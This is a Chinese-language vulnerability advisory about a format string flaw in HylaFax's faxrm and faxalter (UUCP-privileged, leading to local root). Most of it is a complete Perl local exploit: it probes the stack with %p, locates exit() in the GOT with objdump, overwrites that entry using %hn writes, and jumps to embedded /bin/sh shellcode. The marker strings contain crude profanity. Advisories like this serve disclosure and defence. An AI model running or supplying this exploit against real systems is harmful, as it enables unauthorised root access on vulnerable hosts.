HylaFax 存在格式化字符串漏洞发布时间:2001-10-16 更新时间:2001-10-16 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 HylaFax Client version 4.1-5详细描述 HylaFax中的faxrm和faxalter是以UUCP的权利安装的,其中存在格式字符串漏洞, UUCP有在cron中以UID 0运行的程序,所以可能造成本地ROOT权利的获得。 测试代码 #!/usr/bin/perl # babcia padlina ltd. # uid=uucp hylafax/freebsd (<= 4.1.b2) local exploit # not intended to use by children under 18 # bug found by christer.oberg@gmx.net $shellcode = "A" x 5000; $shellcode .= "\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51"; $shellcode .= "\x52\x53\x53\x6a\x3b\x58\xcd\x80"; for($align=0;$align<4;$align++) { $fmt = "0" x $align . "ChujWDupeKomunie" . "%p" x 600; $out = `/usr/local/bin/faxrm -h $fmt 1 2>&1`; if ($out =~ /0x6a756843/) { $prematch = $`; $eat = 0; while($prematch =~ /0x/g) { $eat++; } last; } else { print "Not vulnerable\n"; exit; } } $location = hex(`/usr/bin/objdump -R /usr/local/bin/faxrm | /usr/bin/grep " exit" | /usr/bin/cut -f1 -d " "`); $value = 0xbfbfe704; # safe jump address, as we use huge padding print "Align = $align\n"; print "Eat = $eat\n"; printf("exit() entry @ 0x%x\n", $location); printf("Shellcode @ 0x%x\n", $value); $big = $value & 0x0000ffff; $small = ($value & 0xffff0000) >> 16; if ($big < $small) { $big ^= $small; $small ^= $big; $big ^= $small; $dest_addr[0] = $location; $dest_addr[1] = $location + 2; } else { $dest_addr[0] = $location + 2; $dest_addr[1] = $location; } $precision[0] = $small - (8 * $eat + 16 + $align); $precision[1] = $big - $small; $fmt = "0" x $align . "dupa" . pack('l', $dest_addr[0]) . "chuj" . pack('l', $dest_addr[1]) . "%.8x" x $eat . "%." . $precision[0] . "lx%hn" . "%." . $precision[1] . "lx%hn"; system('/usr/local/bin/faxrm', '-h', $fmt, $shellcode); 解决方案 尚无 相关信息 venglin at freebsd.lublin.pl dotslash at snosoft.com 参考:http://www.securiteam.com/exploits/6C00B1F2UE.html |
